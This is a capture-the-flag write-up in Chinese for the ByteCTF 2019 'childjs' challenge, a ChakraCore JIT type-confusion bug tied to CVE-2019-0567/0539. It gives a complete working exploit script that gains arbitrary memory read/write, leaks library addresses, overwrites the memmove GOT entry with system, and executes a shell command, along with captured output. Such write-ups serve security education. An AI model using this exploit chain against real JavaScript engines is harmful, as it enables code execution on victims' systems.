[PWN] childjs - xfiles xp0int Posted on Sep 11 2019 ``` ByteCTF 2019 childjs Points: 740 Solved: 8 nc 1338 ``` 非常典型的 JavaScript JIT 引擎`类型混淆(Type confusion)`漏洞。 这道题目基于`CVE 2019-0567 / CVE 2019-0539`,涉及微软 Edge 浏览器的 JavaScript 引擎`Chakra`。 下面是题目的 diff: ``` diff -uNr ChakraCore_bak/lib/Backend/GlobOptFields.cpp ChakraCore/lib/Backend/GlobOptFields.cpp --- ChakraCore_bak/lib/Backend/GlobOptFields.cpp 2019-04-24 10:14:24.012350694 +0800 +++ ChakraCore/lib/Backend/GlobOptFields.cpp 2019-04-24 10:16:11.197823797 +0800 @@ -482,7 +482,6 @@ break; case Js::OpCode::InitClass: - case Js::OpCode::InitProto: case Js::OpCode::NewScObjectNoCtor: if (inGlobOpt) { ``` 经过改动后,`Chakra`引擎会认为,`InitProto`指令码的执行过程中不产生任何副作用,而实际上`InitProto`执行过程中,参数的对象类型会发生改变。 经过[JIT](https://zh.wikipedia.org/wiki/%E5%8D%B3%E6%99%82%E7%B7%A8%E8%AD%AF)优化编译后,`Chakra`引擎会移除检查对象类型是否一致的代码。攻击者可以通过旧类型的操作访问新类型对象内存区域以外的数据,实现内存越界读写。 详细的漏洞原理可以参考利用脚本中的链接。 我们利用了两个`DataView`对象。通过类型混淆,我们可以修改`DataView`对象内部指向读写缓冲区的指针,实现对任意内存地址读写。我们首先泄漏`DataView`对象内部的`vtable`指针,从而泄漏`libChakraCore.so`基地址,然后再进一步泄漏`glibc`基地址。 在执行 JavaScript 语句`Uint8Array.set(Uint8Array)`时,`Chakra`引擎会调用`glibc`库的`memmove`函数。我们可以将`libChakraCore.so` GOT 表上`memmove`函数地址修改为`system`,然后将 Shell 命令作为参数传给`Uint8Array.set(Uint8Array)`语句,实现任意命令执行。 利用脚本如下: ``` // ByteCTF 2019 childjs Writeup By xfiles // // Points: 740 Solved: 8 // This challenge is based on CVE 2019-0567 / CVE 2019-0539. // // Reference: https://www.exploit-db.com/exploits/46203 // https://perception-point.io/resources/research/cve-2019-0539-exploitation/ // https://bruce30262.github.io/Chakrazy-exploiting-type-confusion-bug-in-ChakraCore/#arbitrary-readwrite-primitive // https://xz.aliyun.com/t/4475 // https://gist.github.com/eboda/18a3d26cb18f8ded28c899cbd61aeaba // // Comments starting with '(*)' are added by the author of this writeup. // obj = {} obj.a = 1; obj.b = 2; obj.c = 3; obj.d = 4; obj.e = 5; obj.f = 6; obj.g = 7; obj.h = 8; obj.i = 9; obj.j = 10; dv1 = new DataView(new ArrayBuffer(0x100)); dv2 = new DataView(new ArrayBuffer(0x100)); BASE = 0x100000000; function hex(x) { return "0x" + x.toString(16); } function lower(x) { return x & 0xffffffff; } function upper(x) { return parseInt(x / BASE); } function opt(o, proto, value) { o.b = 1; let tmp = {__proto__: proto}; o.a = value; } function main() { for (let i = 0; i < 2000; i++) { let o = {a: 1, b: 2}; opt(o, {}, {}); } let o = {a: 1, b: 2}; // o->auxSlots = obj (Step 1) opt(o, o, obj); // obj->auxSlots = dv1 (Step 2) o.c = dv1; // dv1->buffer = dv2 (Step 3) obj.h = dv2; let read64 = function(addr_lo, addr_hi, dv) { // dv2->buffer = addr (Step 4) dv1.setUint32(0x38, addr_lo, true); dv1.setUint32(0x3C, addr_hi, true); // read from addr (Step 5) return dv2.getInt32(0, true) + dv2.getInt32(4, true) * BASE; } let write64 = function(addr_lo, addr_hi, value_lo, value_hi) { // dv2->buffer = addr (Step 4) dv1.setUint32(0x38, addr_lo, true); dv1.setUint32(0x3C, addr_hi, true); // write to addr (Step 5) dv2.setInt32(0, value_lo, true); dv2.setInt32(4, value_hi, true); // (*) BUG from original PoC // dv2.setInt32(0, value_hi, true); } // get dv2 vtable pointer vtable_lo = dv1.getUint32(0, true); vtable_hi = dv1.getUint32(4, true); vtable = vtable_lo + vtable_hi * BASE + 0x30 // (*) get libChakraCore.so base cha_base = read64(lower(vtable), upper(vtable)) - 0x887ed0; print("Chakra base:", hex(cha_base)); // (*) get glibc base addr = cha_base + 0xe537d0 // (*) write GOT, glibc 2.27 libc = read64(lower(addr), upper(addr)) - 0xf45270; print("libc base:", hex(libc)); // (*) get system address system = libc + 0x4f440; print("system:", hex(system)); var cmd = "cat /home/ctf/f1ag_1s_h3r3_sasdfjasdklghasdlg\0"; // write the command into a Uint8Array var target = new Uint8Array(0x1234); for (var i = 0; i < cmd.length; i++) { target[i] = cmd.charCodeAt(i); } // overwrite memmove with system memmove = cha_base + 0xe53108; print("memmove got:", hex(memmove)); write64(lower(memmove), upper(memmove), lower(system), upper(system)); print("getshell"); // GIMME SHELL NOW var bb = new Uint8Array(10); target.set(bb); } main(); EOF ``` 利用效果(偶尔会`Segmentation fault`): ``` $ cat exp.js | nc 1338 code> code> code> code> code> code> code> code> code> code> code> code> code> code> code> code> code> code> code> code> code> code> code> code> code> code> code> code> code> code> code> code> code> code> code> code> code> code> code> code> code> code> code> code> code> code> code> code> code> code> code> code> code> code> code> code> code> code> code> code> code> code> code> code> code> code> code> code> code> code> code> code> code> code> code> code> code> code> code> code> code> code> code> code> code> code> code> code> code> code> code> code> code> code> code> code> code> code> code> code> code> code> code> code> code> code> code> code> code> code> code> code> code> code> code> code> code> code> code> code> code> code> code> code> code> code> addr: 0x00007FEC7CF68520 Chakra base: 0x7fec78a83000 addr: 0x00007FEC7CF68560 libc base: 0x7fec7b4e5000 addr: 0x00007FEC7CF68500 system: 0x7fec7b534440 addr: 0x00007FEC7CF68540 memmove got: 0x7fec798d6108 addr: 0x00007FEC7CF68580 getshell xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx ================================================================== bytectf{Haklshlashglashklgahlsghalskgh} ``` 打赏还是打残,这是个问题 赏 Wechat Pay Alipay [PWN] mulnote - xfiles [MISC] jigsaw - wwmm
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